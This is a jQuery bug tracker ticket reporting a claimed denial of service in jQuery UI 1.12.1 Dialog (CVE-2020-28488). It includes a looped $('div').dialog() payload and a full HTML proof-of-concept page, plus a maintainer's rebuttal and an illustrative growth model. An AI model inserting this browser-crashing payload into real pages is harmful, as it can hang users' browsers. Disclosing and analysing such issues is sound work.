#15390 new bug
Opened November 25, 2020 07:38PM UTC
Last modified January 29, 2021 09:34AM UTC
Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog
| Reported by: | rafaelcintralopes | Owned by: | |
|---|---|---|---|
| Priority: | major | Milestone: | none |
| Component: | ui.dialog | Version: | 1.12.1 |
| Keywords: | | Cc: | |
| Blocked by: | | Blocking: | |
Description
When we inject the "dialog" for any HTML tag, more than once, the browser and the application crash, closing the application.
**Payload:**

```javascript
for (var i = 0; i < 10; i++) {
    $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}
```
**PoC:**
Create an HTML file with the following code or insert the Payload above in a vulnerable environment:
```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
    <h2>DoS - jQuery UI 1.12.1</h2>
    <div>
        <button onclick="exploit()">Exploit</button>
    </div>
    <p>PoC by Rafael Cintra Lopes</p>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
    <script>
        function exploit(){
            for (var i = 0; i < 10; i++) {
                $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
            }
        }
    </script>
</body>
</html>
```
Attachments (0)
Change History (3)
Changed November 25, 2020 07:39PM UTC by comment:1
| priority: | minor → major |
|---|
Changed January 22, 2021 08:55AM UTC by comment:2
https://snyk.io/vuln/SNYK-JS-JQUERYUI-1052825
Is work being done on this one? Cheers.
Changed January 29, 2021 09:32AM UTC by comment:3
Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.
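
The growth described in comment:3, modelled as an added example (not code from this ticket or from jQuery UI): it counts divs only and runs without a browser. `DIVS_PER_DIALOG`, the function names and the `#settings-dialog` selector are assumptions for illustration; the starting count of one div matches the PoC page above.

```javascript
// Added illustration: models div counts only, not the real jQuery UI DOM.
// ASSUMPTION: each newly created dialog adds DIVS_PER_DIALOG new <div>
// elements to the document. The value 3 is constructed for this example;
// the real number depends on the widget's markup.
const DIVS_PER_DIALOG = 3;

// Models $("div").dialog(...) repeated `iterations` times.
// Divs that are already dialogs only get their options updated; every
// other div in the document is turned into a new dialog.
function simulateGlobalSelector(initialDivs, iterations, perDialog = DIVS_PER_DIALOG) {
  let plain = initialDivs; // divs not yet initialised as dialogs
  let dialogs = 0;         // divs already initialised as dialogs
  const totals = [];
  for (let i = 0; i < iterations; i++) {
    const created = plain;       // each plain div becomes a dialog
    dialogs += created;
    plain = created * perDialog; // markup of the new dialogs is plain divs again
    totals.push(plain + dialogs);
  }
  return totals;
}

// Models a selector scoped to one element, e.g. $("#settings-dialog")
// (hypothetical id): the first call creates the dialog, later calls
// only update its options, so the document stops growing.
function simulateScopedSelector(initialDivs, iterations, perDialog = DIVS_PER_DIALOG) {
  const totals = [];
  let total = initialDivs;
  for (let i = 0; i < iterations; i++) {
    if (i === 0) total += perDialog;
    totals.push(total);
  }
  return totals;
}

// Defensive check an application can run before initialising dialogs:
// proceed only when the selector matched between 1 and maxDialogs elements.
function withinDialogBudget(matchCount, maxDialogs = 1) {
  return matchCount >= 1 && matchCount <= maxDialogs;
}

console.log("global selector:", simulateGlobalSelector(1, 10));
console.log("scoped selector:", simulateScopedSelector(1, 10));
```

With the real widget the per-dialog count differs, but the shape is the same: a document-wide selector multiplies the div count on every pass, while a selector bound to one element keeps it constant.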